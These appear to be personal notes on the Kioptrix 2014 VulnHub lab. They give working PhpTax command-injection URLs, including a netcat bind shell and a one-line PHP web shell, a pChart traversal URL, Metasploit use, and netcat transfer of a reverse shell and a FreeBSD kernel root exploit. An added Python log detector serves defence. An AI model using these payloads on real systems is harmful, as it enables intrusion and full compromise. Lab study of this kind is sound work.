Walkthru
Notes
2nd approach using nc via web using php reverse shell
3rd approach w/o metasploit
===================
walkthru:
1. Updating OpenFuck exploit (764), but it didn't work here: https://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/
2.
==============
Notes:
80/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
MAC Address: 08:00:27:82:89:F9 (Oracle VirtualBox virtual NIC)
Running: FreeBSD 9.X|10.X
OS CPE: cpe:/o:freebsd:freebsd:9 cpe:/o:freebsd:freebsd:10
OS details: FreeBSD 9.0-RELEASE - 10.3-RELEASE
PORT STATE SERVICE VERSION
8080/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
|_http-server-header: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8
|_http-title: 403 Forbidden
MAC Address: 08:00:27:82:89:F9 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.18 - 2.6.22
======
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 172.16.2.34
+ Target Hostname: 172.16.2.34
+ Target Port: 80
+ Start Time: 2018-04-23 15:48:45 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8
+ Server leaks inodes via ETags, header found with file /, inode: 67014, size: 152, mtime: Sat Mar 29 12:22:52 2014
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ PHP/5.3.8 appears to be outdated (current is at least 5.6.9). PHP 5.5.25 and 5.4.41 are also current.
+ OpenSSL/0.9.8q appears to be outdated (current is at least 1.0.1j). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ Apache/2.2.21 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ mod_ssl/2.2.21 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ 8345 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time: 2018-04-23 15:49:58 (GMT-5) (73 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
=====
---- Scanning URL: http://172.16.2.34/ ----
+ http://172.16.2.34/cgi-bin/ (CODE:403|SIZE:210)
--- Scanning URL: http://172.16.2.34:8080/ ----
+ http://172.16.2.34:8080/cgi-bin/ (CODE:403|SIZE:210)
====================
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 172.16.2.34
+ Target Hostname: 172.16.2.34
+ Target Port: 8080
+ Start Time: 2018-04-23 16:08:37 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ All CGI directories 'found', use '-C none' to test none
+ OpenSSL/0.9.8q appears to be outdated (current is at least 1.0.1j). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ Apache/2.2.21 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ PHP/5.3.8 appears to be outdated (current is at least 5.6.9). PHP 5.5.25 and 5.4.41 are also current.
+ mod_ssl/2.2.21 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ 26189 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time: 2018-04-23 16:12:34 (GMT-5) (237 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Steps
1. Tried https://www.exploit-db.com/exploits/29290/ &
2. https://www.exploit-db.com/exploits/764/
didn't work.
3. Source code of the page shows
<META HTTP-EQUIV="refresh" CONTENT="5;URL=pChart2.1.3/index.php">
4. Searchsploit shows that the application pChart is vulnerable to multiple vulnerabilities, so I looked through 31173.txt and found a directory traversal vulnerability that shows the vulnerable URL.
Hitting
/pChart2.1.3/index.php
shows some charting tool. After searching for the tool’s name on searchsploit, it showed that it’s vulnerable to LFI.
Example:
5. Since we have an LFI and we know that the server is running Apache, let's search for the Apache config file. After checking this, I managed to find the httpd.conf file. "In FreeBSD, the main Apache HTTP Server configuration file is installed as /usr/local/etc/apache2x/httpd.conf, where x represents the version number"... source: https://www.freebsd.org/doc/handbook/network-apache.html
http://192.168.1.68/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf
6. Particularly interesting snippet:
SetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser
<VirtualHost *:8080>
DocumentRoot /usr/local/www/apache22/data2
<Directory "/usr/local/www/apache22/data2">
Options Indexes FollowSymLinks
AllowOverride All
Order allow,deny
Allow from env=Mozilla4_browser
</Directory>
</VirtualHost>
(a. Tried to change the user agent in Mozilla but it didn't work: https://jhalon.github.io/vulnhub-kioptrix5/)
(b. Installed the Quick Preference Button plugin, which worked. Use menu spoof -> custom and add "Mozilla/4.0 (compatible; MSIE 4.01; Windows NT 5.0)". Was having a problem the next time, so I removed everything except Mozilla/4.0 and it worked.
source: https://kongwenbin.wordpress.com/2016/11/02/writeup-for-kioptrix-2014-5/ )
root@kali:~/Desktop# curl -H "User-Agent:Mozilla/4.0" http://192.168.1.68:8080
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /</title>
</head>
<body>
<h1>Index of /</h1>
<ul><li><a href="phptax/"> phptax/</a></li>
</ul>
</body></html>
root@kali:~/Desktop# curl -H "User-Agent:Mozilla/4.0" http://192.168.1.68:8080/phptax/
_lots of markup_
8. Oh… well that’s not good! It seems that this is some kind of Tax Return Program called PHPTAX.
A quick Google search revealed that this software was vulnerable to a Remote Code Execution Attack.
Alright, let’s fire up Metasploit and see if we can’t exploit this.
msf > use exploit/multi/http/phptax_exec
msf exploit(phptax_exec) > set RHOST 192.168.1.159
RHOST => 192.168.1.159
msf exploit(phptax_exec) > set RPORT 8080
RPORT => 8080
msf exploit(phptax_exec) > run
/bin/sh -i
sh: can't access tty; job control turned off
$ id
uid=80(www) gid=80(www) groups=80(www)
Now that we have a working TTY Shell, let’s do some reconnaissance and see if we can’t find a privilege escalation exploit.
$ uname -a
FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd6
Another quick Google search revealed that FreeBSD 9.0 was vulnerable to an Intel SYSRET Kernel Privilege Escalation. [28718]
From here let’s go ahead and copy over that exploit, open up a text editor and save it as a .c file on your Kali box. Once that’s done, open up a netcat connection and pipe the exploit file through it.
root@kali:~# gedit sys.c
root@kali:~# nc -lvp 1234 < sys.c
listening on [any] 1234 ...
Now that we have that waiting for us, let’s navigate to the /tmp folder on the Kioptrix Machine, and connect to our netcat connection - which will automatically download the exploit file for us.
$ cd /tmp
$ nc -nv 192.168.1.3 1234 > sys.c
Connection to 192.168.1.3 1234 port [tcp/*] succeeded!
Yes! Let’s compile the exploit and run it!
$ gcc sys.c
$ ./a.out
[+] SYSRET FUCKUP!!
[+] Start Engine...
[+] Crotz...
[+] Crotz...
[+] Crotz...
[+] Woohoo!!!
$ whoami
root
Getting core dumped and privilege escalation not working. Tried a reboot, still no difference.
--------
2nd approach w/o metasploit
source: https://medium.com/bugbountywriteup/kioptrix-2014-c5b1f5144fc9 &
https://blog.techorganic.com/2014/04/08/kioptrix-hacking-challenge-part-5/
Using the LFI vulnerability, I created a file shell.php on the server to run commands (such as id, uname -a).
1. A quick Google search revealed that PHPTAX was vulnerable to remote code execution. To test if this instance was vulnerable, I wrote the output of id into out.txt, and on another browser, I loaded out.txt and was able to view its contents:
http://192.168.1.159:8080/phptax/index.php?pfilez=1040pg1.tob;id > out.txt&pdf=make
2. I used a reverse shell included in Kali under /usr/share/webshells/ but also found here.
3. On my box:
$ nc -lvp 1234 < php-reverse-shell.php
-l to listen for a connection
-v for verbose
-p to specify port
< to print the contents of the file upon connection
4. In the webshell:
/shell.php?cmd=nc 192.168.15.141 1234 > php-reverse-shell.php
> to direct the incoming data into a new file on the server
5. The reverse shell can be invoked by calling its path in the browser.
http://192.168.15.150:8080/phptax/php-reverse-shell.php
--------
3rd approach w/o metasploit
Walkthru 1: https://infosecuritygeek.com/vulnhub-kioptrix-2014/
1. You are able to access the phptax page from the site
2. Found another web application named PHPTax. Again, let’s search for an existing exploit on PHPTax before performing further enumeration.
root@loki:~# searchsploit phptax
--------------------------------------------- ----------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/platforms/)
--------------------------------------------- ----------------------------------
PhpTax - pfilez Parameter Exec Remote Code I | php/webapps/21833.rb
PhpTax 0.8 - File Manipulation (newvalue) / | php/webapps/25849.txt
phptax 0.8 - Remote Code Execution | php/webapps/21665.txt
-------------------------------------------------------------------------------
root@loki:~# cat /usr/share/exploitdb/platforms/php/webapps/21665.txt
-----------------------------------------------------
phptax 0.8 <= Remote Code Execution Vulnerability
-----------------------------------------------------
Discovered by: Jean Pascal Pereira <pereira@secbiz.de>
Vendor information:
"PhpTax is free software to do your U.S. income taxes. Tested under Unix environment.
The program generates .pdfs that can be printed and sent to the IRS. See homepage for details and screenshot."
Vendor URI: http://sourceforge.net/projects/phptax/
----------------------------------------------------
Risk-level: High
The application is prone to a remote code execution vulnerability.
----------------------------------------------------
drawimage.php, line 63:
include ("./files/$_GET[pfilez]");
// makes a png image
$pfilef=str_replace(".tob",".png",$_GET[pfilez]);
$pfilep=str_replace(".tob",".pdf",$_GET[pfilez]);
Header("Content-type: image/png");
if ($_GET[pdf] == "") Imagepng($image);
if ($_GET[pdf] == "make") Imagepng($image,"./data/pdf/$pfilef");
if ($_GET[pdf] == "make") exec("convert ./data/pdf/$pfilef ./data/pdf/$pfilep");
----------------------------------------------------
Exploit / Proof of Concept:
Bindshell on port 23235 using netcat:
http://localhost/phptax/drawimage.php?pfilez=xxx;%20nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make
** Exploit-DB Verified:**
http://localhost/phptax/index.php?pfilez=1040d1-pg2.tob;nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make
<----------------------------TRUNCATED----------------------------->
3. Based on the exploit we found, we need to inject a payload to the address bar to create a simple php web shell on the target. This will make succeeding file transfers easier. You may receive an error if it is successful with creating the exploit/file [error @ http://www.doyler.net/wp-content/uploads/kioptrix5/kioptrix5-12-rce.png ]
http://192.168.5.17:8080/phptax/drawimage.php?pfilez=xxx;echo %22%3C%3Fphp system(\$_GET['cmd']); %3F%3E%22 > shell.php;&pdf=make
3a. This module exploits a vulnerability found in PhpTax, an income tax report generator. When generating a PDF, the icondrawpng() function in drawimage.php does not properly handle the pfilez parameter, which will be used in an exec() statement, and then results in arbitrary remote code execution under the context of the web server. Please note: authentication is not required to exploit this vulnerability.
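Added example (not from these notes or from any of the linked walkthroughs): a Python detector that parses constructed Apache combined-format access-log lines and flags the two request shapes this box exposes, shell metacharacters in PhpTax's pfilez parameter and traversal in pChart's Script parameter. The log lines, addresses and byte counts are constructed; the parameter names and URL paths are the ones quoted in the notes.

```python
import re
from urllib.parse import urlsplit, unquote, unquote_plus

# Apache "combined" log format; the constructed sample lines below follow it.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) \S+" '
                    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"$')
# A PhpTax form name such as 1040pg1.tob never legitimately holds a shell separator.
SHELL_META = re.compile(r'[;|&`$\n]')
# "../" in an include path, or an absolute path, means it escapes the script directory.
TRAVERSAL = re.compile(r'^/|(^|/)\.\.(/|$)')
WATCHED = {"/phptax/": ("pfilez", SHELL_META, "phptax-cmd-injection"),
           "/pChart2.1.3/": ("Script", TRAVERSAL, "pchart-lfi")}

def parse_query(query):
    """Split on '&' only: the ';' inside a PhpTax payload is data, not a separator."""
    params = {}
    for part in filter(None, query.split("&")):
        key, _, value = part.partition("=")
        params.setdefault(unquote(key), []).append(unquote_plus(value))
    return params

def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec, url = m.groupdict(), urlsplit(m.group("target"))
    rec["script"], rec["params"] = url.path, parse_query(url.query)
    return rec

def classify(rec):
    """Return (rule, decoded value) hits for one parsed request."""
    hits = []
    for prefix, (param, pattern, rule) in WATCHED.items():
        if rec["script"].startswith(prefix):
            hits += [(rule, v) for v in rec["params"].get(param, []) if pattern.search(v)]
    return hits

def scan(lines):
    """Return (ip, script, rule, value) for every suspicious request in the log lines."""
    alerts = []
    for rec in filter(None, map(parse_line, lines)):
        alerts += [(rec["ip"], rec["script"], rule, v) for rule, v in classify(rec)]
    return alerts

SAMPLE_LOG = [  # constructed: one benign PDF request, one pfilez injection, one pChart LFI
    '192.168.5.20 - - [23/Apr/2018:16:08:37 -0500] "GET /phptax/index.php?pfilez=1040pg1.tob&pdf=make HTTP/1.1" 200 152 "-" "Mozilla/5.0"',
    '192.168.5.14 - - [23/Apr/2018:16:09:02 -0500] "GET /phptax/drawimage.php?pfilez=xxx;id%20%3E%20out.txt;&pdf=make HTTP/1.1" 200 152 "-" "Mozilla/4.0"',
    '192.168.5.14 - - [23/Apr/2018:16:09:40 -0500] "GET /pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf HTTP/1.1" 200 4210 "-" "Mozilla/5.0"',
]
```

Running scan(SAMPLE_LOG) yields one alert for the pfilez injection and one for the pChart traversal; the benign PDF request produces nothing.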
3b. Single Line PHP Script to Gain Shell
Since WebApp security is what I’m most interested in at the moment, I have been learning PHP, I’m not finished learning yet, but today (while reading about how inputs should be sanitised before using “include”) I remembered the single line PHP shell, and I had a go and this is what I came up with: [source : http://www.grobinson.me/single-line-php-script-to-gain-shell/]
4. Let’s check if the injection is successful.
Success!
13. Next, we can download a reverse php shell from pentest monkey and transfer it to the target via netcat for an interactive web shell.
Kali:
root@loki:~/Desktop# nc -nlvp 1337 < reverse.php
listening on [any] 1337 ...
Browser:
http://192.168.5.17:8080/phptax/shell.php?cmd=nc%20192.168.5.14%201337%20%3E%20reverse.php
14. Let's browse to reverse.php we uploaded to trigger the reverse connection. [This didn't work. Was unable to get a reverse shell. Tried to run http://192.168.5.17:8080/phptax/shell.php?cmd=reverse.php and http://192.168.5.17:8080/phptax/reverse.php but no luck]
root@loki:~/Desktop# nc -nlvp 1337
listening on [any] 1337 ...
connect to [192.168.5.14] from (UNKNOWN) [192.168.5.17] 22157
FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64
1:46PM up 2:02, 0 users, load averages: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE WHAT
uid=80(www) gid=80(www) groups=80(www)
sh: can't access tty; job control turned off
$ id
uid=80(www) gid=80(
====================
source: https://chousensha.github.io/blog/2014/06/27/kioptrix-2014/
We managed to break through. Now let's see how we can become root. I used this mmap/ptrace exploit. I downloaded it to my machine and served it on netcat, then I connected from the victim to the attacker machine and saved the file to the /tmp directory. From there, it was a matter of compiling it and running it: